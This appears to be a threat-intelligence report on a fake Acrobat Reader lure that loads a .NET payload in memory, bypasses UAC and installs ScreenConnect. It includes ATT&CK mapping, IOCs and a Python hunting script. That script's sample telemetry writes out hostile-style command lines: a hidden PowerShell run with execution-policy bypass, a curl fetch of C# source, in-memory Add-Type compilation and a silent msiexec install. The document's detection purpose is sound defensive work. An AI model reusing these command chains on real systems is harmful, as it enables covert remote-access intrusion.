
In-Memory Loader Drops ScreenConnect | ThreatLabz

Attackers are utilizing a fake Adobe Acrobat Reader lure to deploy a highly obfuscated VBScript loader that executes a .NET payload entirely in-memory. The attack chain leverages PEB manipulation for process masquerading and abuses auto-elevated COM objects to bypass UAC, ultimately installing the legitimate ScreenConnect remote access tool for malicious purposes.

Confidence: high · Analyzed: 2026-04-09

Authors: KAIVALYA KHURSALE

Source: Zscaler ThreatLabz


Key Takeaways

  • Attack chain uses heavy obfuscation and direct in-memory execution to deploy the legitimate ScreenConnect RMM tool.
  • Uses .NET reflection to keep payloads in memory, evading signature-based defenses and hindering forensic examination.
  • A VBScript loader dynamically reconstructs strings and objects at runtime to defeat static analysis.
  • Auto-elevated COM objects are abused to bypass UAC and run with elevated privileges without user prompts.
  • Process Environment Block (PEB) manipulation is used to masquerade the loader's running Windows process to avoid EDR alerts.

Affected Systems

  • Windows

Attack Chain

The attack begins with a fake Adobe Acrobat Reader download that delivers an obfuscated VBScript loader. This script dynamically constructs objects to launch PowerShell, which downloads and compiles a C# payload entirely in-memory using .NET reflection. The in-memory loader retrieves the PEB to perform process masquerading as winhlp32.exe and bypasses UAC via auto-elevated COM objects. Finally, it downloads and silently installs the ScreenConnect remote access tool via msiexec.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide any pre-built detection rules or queries.

Detection Engineering Assessment

  • EDR Visibility: Medium. In-memory execution and PEB manipulation can evade some user-mode hooks, but the initial PowerShell compilation (Add-Type) and msiexec spawning are highly visible to modern EDRs.
  • Network Visibility: Medium. Downloads occur from Google Drive and a short-link service (x0.at), which are generally encrypted via HTTPS, limiting deep packet inspection, but the domain connections are visible.
  • Detection Difficulty: Hard. Heavy obfuscation, in-memory execution, and the use of legitimate RMM tools (ScreenConnect) make distinguishing malicious activity from legitimate administrative tasks difficult.

Required Log Sources

  • Process Creation (Event ID 4688)
  • PowerShell Script Block Logging (Event ID 4104)
  • File Creation (Sysmon Event ID 11)

Hunting Hypotheses

| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
| --- | --- | --- | --- |
| Look for PowerShell executing Add-Type with -ReferencedAssemblies shortly after downloading a file via curl.exe or Invoke-WebRequest. | Process Creation, PowerShell Script Block Logging | Execution | Medium |
| Monitor for msiexec.exe installing ScreenConnect originating from unusual parent processes or temporary directories like C:\Temp. | Process Creation | Execution | Low |
| Hunt for processes masquerading as winhlp32.exe but lacking the expected Microsoft digital signature or originating from unexpected paths. | Process Creation, File Metadata | Defense Evasion | Low |
| Identify wscript.exe or cscript.exe spawning powershell.exe with the -ExecutionPolicy Bypass flag. | Process Creation | Execution | Medium |
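The four hypotheses above, implemented as detection logic over a constructed set of process-creation and script-block events. This is an added example, not code from the ThreatLabz article or from Zscaler; the event fields, the temp-directory list, the 120-second download window, and the expected-parent allowlist for msiexec are assumptions to tune against your own telemetry.

```python
import re

# Constructed sample telemetry (not real logs): kind="proc" models Event ID 4688 process creation,
# kind="script" models Event ID 4104 with the script block text carried in "cmd".
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    dict(ts=0, kind="proc", pid=4120, parent=r"C:\Windows\System32\wscript.exe", image=PS,
         cmd=r"powershell.exe -ExecutionPolicy Bypass -w hidden -File C:\Users\Public\stage.ps1"),
    dict(ts=5, kind="proc", pid=4130, parent=PS, image=r"C:\Windows\System32\curl.exe",
         cmd=r"curl.exe -o C:\Windows\Temp\FileR.txt https://example.invalid/src.txt"),
    dict(ts=9, kind="script", pid=4120, cmd="Add-Type -TypeDefinition $src -ReferencedAssemblies System.dll"),
    dict(ts=60, kind="proc", pid=4150, parent=PS, image=r"C:\Windows\System32\msiexec.exe",
         cmd=r"msiexec /i C:\Temp\ScreenConnect.ClientSetup.msi /quiet"),
    dict(ts=61, kind="proc", pid=4160, parent=PS, image=r"C:\Users\Public\winhlp32.exe", cmd="winhlp32.exe", signed=False),
    # benign noise: the genuine help viewer, and an IT-deployed install from a managed share
    dict(ts=99, kind="proc", pid=5000, parent=r"C:\Windows\explorer.exe", image=r"C:\Windows\winhlp32.exe", cmd="winhlp32.exe"),
    dict(ts=100, kind="proc", pid=5010, parent=r"C:\Windows\System32\services.exe", image=r"C:\Windows\System32\msiexec.exe",
         cmd=r"msiexec /i C:\ProgramData\IT\ScreenConnect.ClientSetup.msi /quiet"),
]
TEMP_DIRS = ("c:\\temp\\", "c:\\windows\\temp\\", "\\appdata\\local\\temp\\")
INSTALL_PARENTS = ("services.exe", "explorer.exe")   # assumed expected msiexec parents; tune per estate
DOWNLOAD_WINDOW = 120                                # assumed seconds between download and Add-Type call

def base(path):  # lower-cased file name component of a Windows path ('' when absent)
    return path.lower().rsplit("\\", 1)[-1]

def hunt(events):  # applies the four hypotheses, returns (hypothesis, pid) hits in time order
    hits, downloads = [], []   # downloads: timestamps of curl.exe / Invoke-WebRequest activity
    for e in sorted(events, key=lambda x: x["ts"]):
        img, par, cmd = base(e.get("image", "")), base(e.get("parent", "")), e["cmd"].lower()
        if img == "curl.exe" or "invoke-webrequest" in cmd:
            downloads.append(e["ts"])
        # H1: Add-Type with -ReferencedAssemblies shortly after a download (in-memory compile)
        if e["kind"] == "script" and "add-type" in cmd and "-referencedassemblies" in cmd \
                and any(0 <= e["ts"] - t <= DOWNLOAD_WINDOW for t in downloads):
            hits.append(("H1 in-memory compile after download", e["pid"]))
        # H2: msiexec installing ScreenConnect from a temp directory or an unexpected parent
        if img == "msiexec.exe" and "screenconnect" in cmd and \
                (any(d in cmd for d in TEMP_DIRS) or par not in INSTALL_PARENTS):
            hits.append(("H2 suspicious ScreenConnect install", e["pid"]))
        # H3: winhlp32.exe running outside C:\Windows or without its Microsoft signature
        if img == "winhlp32.exe" and (not e["image"].lower().startswith("c:\\windows\\")
                                      or not e.get("signed", True)):
            hits.append(("H3 winhlp32.exe masquerade", e["pid"]))
        # H4: wscript/cscript launching powershell.exe with -ExecutionPolicy Bypass (or -ep bypass)
        if par in ("wscript.exe", "cscript.exe") and img == "powershell.exe" \
                and re.search(r"-(executionpolicy|ep)\s+bypass", cmd):
            hits.append(("H4 script host spawning PowerShell", e["pid"]))
    return hits
```

Running `hunt(SAMPLE)` flags the four malicious events and leaves the two benign ones untouched; the signature field is a stand-in for whatever file-metadata source your EDR exposes.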

Control Gaps

  • Lack of strict application control for RMM tools
  • Insufficient PowerShell execution policy enforcement

Key Behavioral Indicators

  • PowerShell compiling C# in-memory via Add-Type
  • VBScript dynamically constructing WScript.Shell
  • COM object elevation monikers used by unexpected processes

False Positive Assessment

  • Medium

Recommendations

Immediate Mitigation

  • Block access to the known malicious URLs (x0[.]at and the specific Google Drive link).
  • Search endpoints for the presence of Acrobat_Reader_V112_6971.vbs or unauthorized ScreenConnect installations.

Infrastructure Hardening

  • Restrict the execution of VBScript and PowerShell scripts using AppLocker or Windows Defender Application Control (WDAC).
  • Implement strict controls and monitoring around the installation and execution of Remote Monitoring and Management (RMM) tools.

User Protection

  • Ensure EDR solutions are configured to monitor for in-memory .NET reflection and PEB manipulation.
  • Enforce strict UAC settings and monitor for COM object abuse.

Security Awareness

  • Train users to identify fake software update lures, particularly for common applications like Adobe Acrobat Reader.

MITRE ATT&CK Mapping

  • T1059.005 - Command and Scripting Interpreter: Visual Basic
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1620 - Reflective Code Loading
  • T1036.005 - Masquerading: Match Legitimate Name or Location
  • T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
  • T1219 - Remote Access Software
  • T1105 - Ingress Tool Transfer
  • T1027 - Obfuscated Files or Information

Additional IOCs

  • File Paths:
    • C:\Windows\Temp\FileR.txt - Temporary file path where the downloaded C# source code is stored before in-memory compilation.
    • C:\Windows\winhlp32.exe - Legitimate Windows binary path used for process masquerading via PEB manipulation.
    • C:\Temp - Directory created by the final stage PowerShell script to store the downloaded ScreenConnect MSI.
  • Command Lines:
    • Purpose: Downloads a text file containing C# source code and compiles it in-memory using .NET reflection. | Tools: powershell.exe, curl.exe | Stage: Execution/Defense Evasion
    • Purpose: Installs the downloaded ScreenConnect MSI payload. | Tools: msiexec.exe | Stage: Execution/Persistence | msiexec /i ScreenConnect.ClientSetup.msi